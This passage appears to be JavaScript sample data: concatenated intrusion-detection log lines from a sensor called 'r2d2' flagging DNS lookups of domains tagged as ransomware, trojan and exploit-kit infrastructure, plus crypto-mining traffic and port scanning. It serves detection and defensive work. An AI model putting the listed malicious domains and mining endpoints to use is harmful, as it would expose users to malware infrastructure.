    '"2021-01-11 01:23:43.399933" r2d2 2.200.107.146 39744 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:23:47.546192" r2d2 2.200.110.233 64441 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:23:47.547738" r2d2 2.200.107.146 22990 190.202.128.43 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:23:48.084680" r2d2 2.200.110.233 63506 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:23:59.607663" r2d2 2.200.110.232 64949 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:23:59.609578" r2d2 2.200.107.146 1069 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:24:56.825241" r2d2 2.200.110.232 63419 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:24:56.825105" r2d2 2.200.110.232 65167 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:24:56.824903" r2d2 2.200.110.232 64588 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:24:56.826732" r2d2 2.200.107.146 55602 212.18.248.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:24:56.827043" r2d2 2.200.107.146 2791 192.26.92.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:24:56.826943" r2d2 2.200.107.146 1112 192.35.51.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:24:56.853540" r2d2 2.200.110.233 63494 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 01:24:56.869688" r2d2 2.200.110.233 63685 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:24:56.925884" r2d2 2.200.110.232 65180 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:24:56.955242" r2d2 2.200.110.232 64873 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:24:56.956927" r2d2 2.200.107.146 5619 192.55.83.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:24:56.993065" r2d2 2.200.110.233 65212 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:24:57.025716" r2d2 2.200.110.232 64531 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:24:57.074239" r2d2 2.200.110.233 49260 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:24:57.134713" r2d2 2.200.110.232 49338 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:24:57.265307" r2d2 2.200.110.232 63997 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:24:57.274242" r2d2 2.200.110.232 63595 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:24:57.285688" r2d2 2.200.110.232 64812 2.200.107.169 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:24:57.545099" r2d2 2.200.110.232 65527 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:24:57.745273" r2d2 2.200.110.232 64453 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:24:58.085120" r2d2 2.200.110.232 63511 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:24:58.087231" r2d2 2.200.107.146 30730 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:24:58.122967" r2d2 2.200.110.233 64909 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:25:14.746007" r2d2 10.1.19.42 59221 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:25:30.227558" r2d2 178.17.174.14 38394 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:25:30.227552" r2d2 178.17.174.14 38394 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:25:43.382204" r2d2 2.200.110.232 65322 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:25:43.383930" r2d2 2.200.107.146 37217 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:25:59.624141" r2d2 2.200.110.232 64601 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:26:08.132569" r2d2 2.200.110.233 63796 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:26:22.597917" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:22.698539" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:22.799161" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:23.000443" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:23.698327" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:24.196666" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:24.797072" r2d2 10.3.160.42 15536 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:26:30.980299" r2d2 10.1.19.42 59222 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:26:56.139476" r2d2 2.200.107.169 53 2.200.110.232 64994 UDP DNS (bcsservices).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:26:56.139464" r2d2 2.200.107.169 53 2.200.110.232 64994 UDP DNS (bcsservices).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:26:58.020372" r2d2 2.200.110.232 63512 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:26:58.022650" r2d2 2.200.107.146 17912 173.245.58.63 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:26:58.046741" r2d2 2.200.110.233 64599 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:26:58.435730" r2d2 2.200.110.232 63935 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:26:58.437475" r2d2 2.200.107.146 1040 173.245.58.63 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:26:59.608419" r2d2 2.200.110.232 63826 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:26:59.609797" r2d2 2.200.107.146 3148 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:27:16.006672" r2d2 2.200.110.233 64871 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:27:16.008274" r2d2 2.200.107.146 23443 54.147.161.132 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:27:16.891996" r2d2 2.200.110.233 64460 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:27:16.960805" r2d2 2.200.110.232 65453 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:27:16.962261" r2d2 2.200.107.146 33871 37.209.194.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:27:16.988521" r2d2 2.200.110.233 65017 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 01:27:16.991179" r2d2 2.200.110.233 49190 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:27:18.139301" r2d2 2.200.110.232 63385 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:27:18.177313" r2d2 2.200.110.233 63530 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:27:59.622499" r2d2 2.200.110.232 65326 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:28:27.122858" r2d2 2.200.110.233 63521 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:28:28.181347" r2d2 2.200.110.232 49393 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:28:28.211470" r2d2 2.200.110.233 64019 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:28:43.381880" r2d2 2.200.110.232 64473 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:29:21.330100" r2d2 2.200.105.226 59927 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:29:37.043495" r2d2 2.200.110.232 65240 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:29:37.243474" r2d2 2.200.110.232 64433 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:29:37.284682" r2d2 2.200.110.233 63935 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:29:38.240934" r2d2 2.200.110.233 65072 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:29:38.213350" r2d2 2.200.110.232 64621 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:29:38.214808" r2d2 2.200.107.146 63648 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:29:50.701288" r2d2 10.1.19.42 59224 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:29:59.608212" r2d2 2.200.110.232 63385 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:29:59.610126" r2d2 2.200.107.146 43434 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:30:24.659314" r2d2 2.200.105.140 14384 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:30:24.659306" r2d2 2.200.105.140 14384 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:30:24.870224" r2d2 2.200.105.140 14384 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:30:25.291988" r2d2 2.200.105.140 14384 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:30:43.397018" r2d2 2.200.110.232 49291 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:30:43.398544" r2d2 2.200.107.146 49241 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:30:48.247850" r2d2 2.200.110.233 64672 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:30:53.856858" r2d2 10.43.192.103 56233 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:30:59.818164" r2d2 10.43.192.103 56234 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:31:06.176608" r2d2 2.200.110.232 49455 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:31:06.204454" r2d2 2.200.110.233 65220 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:31:06.686248" r2d2 2.200.110.232 64239 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:31:06.688329" r2d2 2.200.107.146 40087 46.101.179.64 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:31:07.121032" r2d2 2.200.110.232 64908 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:31:11.880699" r2d2 10.43.192.103 56239 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:31:23.948529" r2d2 10.43.192.103 56241 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:31:25.816467" r2d2 2.200.110.232 64143 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:31:25.817739" r2d2 2.200.107.146 13092 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:31:29.986633" r2d2 10.43.192.103 56242 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:31:36.015469" r2d2 10.43.192.103 56244 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:31:43.380751" r2d2 2.200.110.232 63783 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:31:43.382479" r2d2 2.200.107.146 12379 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:31:54.117739" r2d2 10.43.192.103 56247 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:31:58.247439" r2d2 2.200.110.232 65532 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:31:58.274882" r2d2 2.200.110.233 63528 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:32:01.394099" r2d2 178.17.174.14 56474 2.200.109.24 80 TCP UA "Xxx (Mozilla/5.0 \\(Windows NT 6.1; WOW64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/27.0.1453.93 Safari/537.36 Mozilla/5.0 \\(SymbianOS/9.2; U; Series60/3.1 NokiaXxx/1.0; Profile/MIDP-2.0 Configuration/CLDC-1.1\\) AppleWebKit/413 \\(KHTML, like Gecko\\) Safari/413)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:32:01.394105" r2d2 178.17.174.14 56474 2.200.109.24 80 TCP UA "Xxx (Mozilla/5.0 \\(Windows NT 6.1; WOW64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/27.0.1453.93 Safari/537.36 Mozilla/5.0 \\(SymbianOS/9.2; U; Series60/3.1 NokiaXxx/1.0; Profile/MIDP-2.0 Configuration/CLDC-1.1\\) AppleWebKit/413 \\(KHTML, like Gecko\\) Safari/413)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:32:12.223700" r2d2 10.43.192.103 56252 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:32:10.041723" r2d2 178.17.174.14 56972 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; IE0006_ver1;EN_US\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:32:10.041720" r2d2 178.17.174.14 56972 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; IE0006_ver1;EN_US\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:32:23.168202" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:23.265820" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:23.367287" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:23.865993" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:24.265815" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:24.768975" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:25.366107" r2d2 10.3.160.42 15539 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:32:30.340622" r2d2 10.43.192.103 56255 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:32:34.653054" r2d2 10.1.19.42 59227 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:32:39.777593" r2d2 2.200.105.226 59637 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:32:42.410683" r2d2 10.43.192.103 56257 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:32:48.445634" r2d2 10.43.192.103 56258 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:32:53.605960" r2d2 10.44.70.211 51448 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:32:59.608445" r2d2 2.200.110.232 49209 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:32:59.623904" r2d2 2.200.107.146 49575 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:32:59.621479" r2d2 2.200.110.232 63898 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:33:00.535865" r2d2 10.43.192.103 56260 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:33:08.281454" r2d2 2.200.110.233 64083 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:33:18.636149" r2d2 10.43.192.103 56263 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:33:30.701711" r2d2 10.43.192.103 56265 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:33:31.000515" r2d2 2.200.108.59 23118,23124,23125,23126,23131,23132,23133,23137,23141,23142,23144,23145,23147,23148,23149,32968,33026,33222,33228,34108,34428,35016,35168,35292,36174,36666,37150,37940,38780,39432,39436,40578,40882,41128,41410,42400,42678,42938,42964,43010,43102,44114,44724,44958,45150,45662,45663,45666,45912,46096,46730,47226,47280,47660,48096,48630,48672,48778,49096,49354,49388,49412,49508,49610,49832,50450,50630,51538,51610,51816,52056,52324,52380,52474,52838,53412,53822,53972,54060,54114,54510,54796,55390,55480,55816,56426,56526,57238,57746,58116,58676,58808,59488 77.53.81.105 21,5013,5148,6465,8003,8709,10422,11169,12057,13515,14273,14451,16110,18124,18249,18461,19073,20095,21334,22561,23424,23929,24146,24329,25167,26208,26426,26934,27286,27594,28205,29978,30086,30682,31099,31947,32347,32829,32957,33615,35606,35651,36248,36373,36580,36887,37058,39961,40939,42497,43448,44774,44984,45221,46240,46306,47845,48037,49833,50607,51081,51729,54118,57537,57756,58953,59374,62475,62485,63272,63695,64237,65027,65367 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:33:32.000521" r2d2 2.200.108.59 23133,23134,23135,23136,23139,23142,23143,23147,23149,32968,33026,34294,34428,34630,34962,35016,35168,35726,35810,35952,36174,36326,36972,37150,39144,39438,39440,39441,39443,41092,41410,41512,41568,41890,43010,43162,43480,43856,43884,44494,44576,45150,45510,45665,45868,45940,46612,46630,46728,47226,47392,47566,47766,48100,48452,49508,49532,49610,50450,51288,51330,51650,51816,51894,52158,52324,52354,52474,53920,53972,54114,55390,56312,56426,56526,56958,57044,58116,58296,58344,58676,58922,60888 77.53.81.105 21,6246,8075,9237,10422,11169,12045,12057,13076,14905,15048,16110,16149,18461,19490,20017,20343,20769,21059,22274,22415,24356,26002,26426,26934,27286,27594,29225,29677,29957,29978,30086,30279,33165,33273,35606,36248,36543,36580,36887,37058,37289,37373,38378,38722,39517,40662,41713,43448,46240,47927,48669,51081,51408,52547,54236,54460,54622,54861,55051,57756,58208,58845,58953,62475,62800,63272,64095,64168,64237 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:33:36.738202" r2d2 10.43.192.103 56266 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:33:31.000515" r2d2 2.200.108.59 23117,23118,23120,23121,23128,23131,23134,23136,23138,23139,23140,23144,23146,32978,33222,33228,34108,34294,34962,35292,35726,35952,36296,36972,39228,39433,39434,39438,39439,39442,40578,40752,41092,41128,41890,42400,42716,42938,43048,43102,43162,43402,43708,43714,44124,44524,44576,44844,44872,45510,45661,45664,45665,45666,45667,45756,45940,46096,46540,46612,47182,47566,47660,48100,48200,48430,48630,48672,48778,49038,49096,49224,49388,49412,49458,49832,49910,50828,51538,51610,51894,52158,52296,52380,52394,52838,53740,54346,55654,56290,56310,57238,57648,57982,58638,58808,58922,59370,59488,60138,60194,60368,60692,60888 77.53.81.105 21,5013,5148,6017,6246,7240,8003,8075,8204,8442,8709,9021,9878,10411,12045,12364,13515,14273,14451,15503,16149,18794,19754,20394,20769,21945,22322,23950,24329,24356,25167,26002,26208,27552,29677,31099,32347,32957,33273,33644,36543,37979,38378,39961,40939,41132,41713,42026,42497,42697,43014,44648,44774,46172,46306,46559,47046,47695,47845,47927,48037,48669,49279,49365,49822,51529,54118,54236,55051,58208,58719,58845,59374,60115,61558,61841,62485,62951,64663,65027,65284,65367 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:33:42.906398" r2d2 2.200.110.232 64260 2.200.107.168 53 UDP DNS (td-username-db4-63-185).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 01:33:34.000398" r2d2 2.200.108.59 34240,40752,40892,42716,43714,43856,44524,45040,45756,46540,48200,49458,51288,52354,53740,53890,54368,57982 77.53.81.105 7240,15238,19754,21059,22322,22760,23952,33644,40662,41132,43169,46559,47689,47695,49279,49365,54460,58719 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:33:48.816031" r2d2 10.43.192.103 56268 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:06.920532" r2d2 10.43.192.103 56271 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:09.499166" r2d2 2.200.106.65 65188 2.200.107.168 53 UDP DNS (charlottefamilyyogacenter).com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:34:09.500863" r2d2 2.200.107.146 20916 172.64.33.237 53 UDP DNS (charlottefamilyyogacenter).com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:34:09.515783" r2d2 2.200.106.65 64760 2.200.107.168 53 UDP DNS (charlottefamilyyogacenter).com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:34:09.517132" r2d2 2.200.107.146 41448 108.162.192.107 53 UDP DNS (charlottefamilyyogacenter).com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:34:17.133065" r2d2 2.200.107.146 53250 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:34:17.131597" r2d2 2.200.110.232 65079 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:34:17.185901" r2d2 2.200.110.233 63548 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:34:18.284355" r2d2 2.200.107.146 11861 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:34:18.282300" r2d2 2.200.110.232 49424 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:34:18.311674" r2d2 2.200.110.233 64206 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:34:19.000165" r2d2 10.43.192.103 56273 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:25.037443" r2d2 10.43.192.103 56274 213.252.245.197 457 TCP IPORT 213.252.245.197:457 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:34:25.406903" r2d2 10.3.160.42 13675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:34:26.406776" r2d2 10.3.160.42 13675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:34:26.909273" r2d2 10.3.160.42 13675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:34:28.005541" r2d2 2.200.105.226 58266 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
